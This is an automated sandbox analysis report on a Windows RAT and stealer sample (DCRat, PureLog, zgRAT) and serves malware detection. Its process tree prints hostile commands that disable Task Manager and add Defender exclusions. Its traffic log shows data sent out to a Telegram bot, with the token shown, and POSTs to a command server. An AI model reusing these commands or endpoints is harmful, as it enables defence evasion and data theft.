Windows Analysis Report
PbfYaIvR5B.exe

Overview

General Information

Sample name: PbfYaIvR5B.exe (renamed because original name is a hash value)
Original sample name: 7471eb468a1f0166167f369bec578915.exe
Analysis ID: 1543377
MD5: 7471eb468a1f0166167f369bec578915
SHA1: 9ded35e930d112a8909dad6aaf1a657f65284588
SHA256: 9e52adafb9ddb7668e8c025ebd74a856434b0c4c487a6204fe750e683bc3dbe4
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • PbfYaIvR5B.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\PbfYaIvR5B.exe" MD5: 7471EB468A1F0166167F369BEC578915)
    • wscript.exe (PID: 7312 cmdline: "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7628 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • MsPortSavesruntime.exe (PID: 7644 cmdline: "C:\webHostnet/MsPortSavesruntime.exe" MD5: 4F593957FF5A8313DC52738F85592CBA)
          • powershell.exe (PID: 6948 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6328 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7192 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 8176 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 7284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7268 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 6164 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7332 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7916 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7948 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • AvdGjRxbXYfvkpkpztF.exe (PID: 7144 cmdline: "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe" MD5: 4F593957FF5A8313DC52738F85592CBA)
    • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AvdGjRxbXYfvkpkpztF.exe (PID: 3512 cmdline: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe MD5: 4F593957FF5A8313DC52738F85592CBA)
  • AvdGjRxbXYfvkpkpztF.exe (PID: 3584 cmdline: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe MD5: 4F593957FF5A8313DC52738F85592CBA)
  • Idle.exe (PID: 4312 cmdline: "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe" MD5: 4F593957FF5A8313DC52738F85592CBA)
  • Idle.exe (PID: 2084 cmdline: "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe" MD5: 4F593957FF5A8313DC52738F85592CBA)
  • MsPortSavesruntime.exe (PID: 3128 cmdline: C:\webHostnet\MsPortSavesruntime.exe MD5: 4F593957FF5A8313DC52738F85592CBA)
  • MsPortSavesruntime.exe (PID: 4020 cmdline: C:\webHostnet\MsPortSavesruntime.exe MD5: 4F593957FF5A8313DC52738F85592CBA)
  • svchost.exe (PID: 7792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| PbfYaIvR5B.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| PbfYaIvR5B.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000006.00000000.1888745544.0000000000CC2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000006.00000002.2026149652.0000000013385000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| 00000000.00000003.1690511695.000000000744A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000000.00000003.1689915107.0000000006B32000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| Process Memory Space: MsPortSavesruntime.exe PID: 7644 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| 0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| 0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 0.3.PbfYaIvR5B.exe.7456cda.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

                                    System Summary

                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe" , CommandLine: "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7332, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe" , ProcessId: 7144, ProcessName: AvdGjRxbXYfvkpkpztF.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\webHostnet/MsPortSavesruntime.exe", ParentImage: C:\webHostnet\MsPortSavesruntime.exe, ParentProcessId: 7644, ParentProcessName: MsPortSavesruntime.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', ProcessId: 6948, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PbfYaIvR5B.exe", ParentImage: C:\Users\user\Desktop\PbfYaIvR5B.exe, ParentProcessId: 7268, ParentProcessName: PbfYaIvR5B.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe" , ProcessId: 7312, ProcessName: wscript.exe
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\webHostnet/MsPortSavesruntime.exe", ParentImage: C:\webHostnet\MsPortSavesruntime.exe, ParentProcessId: 7644, ParentProcessName: MsPortSavesruntime.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', ProcessId: 6948, ProcessName: powershell.exe
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7792, ProcessName: svchost.exe
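| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-10-27T19:22:43.305353+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 188.114.97.3 | 80 | TCP |

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-10-27T19:22:28.144078+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 34.117.59.81 | 443 | TCP |
| 2024-10-27T19:22:51.390049+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 34.117.59.81 | 443 | TCP |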


                                    AV Detection

Source: PbfYaIvR5B.exe, Avira: detected
Source: C:\Users\user\Desktop\MSRJxIpk.log, Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\MXTAwxLv.log, Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\XGvzhUkS.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\XLyrgJGd.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, ReversingLabs: Detection: 66%
Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, ReversingLabs: Detection: 66%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe, ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\MaBbbrQq.log, ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\XGvzhUkS.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\XLyrgJGd.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\XurZRnMb.log, ReversingLabs: Detection: 23%
Source: C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe, ReversingLabs: Detection: 66%
Source: C:\webHostnet\MsPortSavesruntime.exe, ReversingLabs: Detection: 66%
Source: PbfYaIvR5B.exe, ReversingLabs: Detection: 68%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\mhsoucuo.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\lhjGsiaz.log, Joe Sandbox ML: detected
Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, Joe Sandbox ML: detected
Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\XGvzhUkS.log, Joe Sandbox ML: detected
Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\XLyrgJGd.log, Joe Sandbox ML: detected
Source: PbfYaIvR5B.exe, Joe Sandbox ML: detected
Source: PbfYaIvR5B.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\webHostnet\MsPortSavesruntime.exe, Directory created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe
Source: C:\webHostnet\MsPortSavesruntime.exe, Directory created: C:\Program Files\Windows NT\Accessories\en-GB\6ccacd8608530f
Source: unknown, HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: PbfYaIvR5B.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PbfYaIvR5B.exe, 00000000.00000003.1690511695.00000000073F8000.00000004.00000020.00020000.00000000.sdmp, PbfYaIvR5B.exe, 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp, PbfYaIvR5B.exe, 00000000.00000000.1688277278.0000000000073000.00000002.00000001.01000000.00000003.sdmp, PbfYaIvR5B.exe, 00000000.00000003.1689915107.0000000006AE0000.00000004.00000020.00020000.00000000.sdmp
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0004A69B
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0005C220
Source: C:\webHostnet\MsPortSavesruntime.exe, File opened: C:\Users\user
Source: C:\webHostnet\MsPortSavesruntime.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\webHostnet\MsPortSavesruntime.exe, File opened: C:\Users\user\AppData
Source: C:\webHostnet\MsPortSavesruntime.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\webHostnet\MsPortSavesruntime.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\webHostnet\MsPortSavesruntime.exe, File opened: C:\Users\user\AppData\Local

                                    Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

Source: Network traffic, Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 188.114.97.3:80
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown, DNS query: name: api.telegram.org
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficHTTP traffic detected: POST /bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="68d30593-7ba0-4754-ba4f-858b55a2ddb4"Host: api.telegram.orgContent-Length: 74846Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficHTTP traffic detected: POST /bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="e62f1995-643c-4ec6-8579-e0af2437cb00"Host: api.telegram.orgContent-Length: 74797Expect: 100-continueConnection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 188.114.97.3
Source: Joe Sandbox View, IP Address: 34.117.59.81
Source: Joe Sandbox View, ASN Name: TELEGRAMRU
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: ipinfo.io
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 34.117.59.81:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 34.117.59.81:443
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1712Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 130940Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
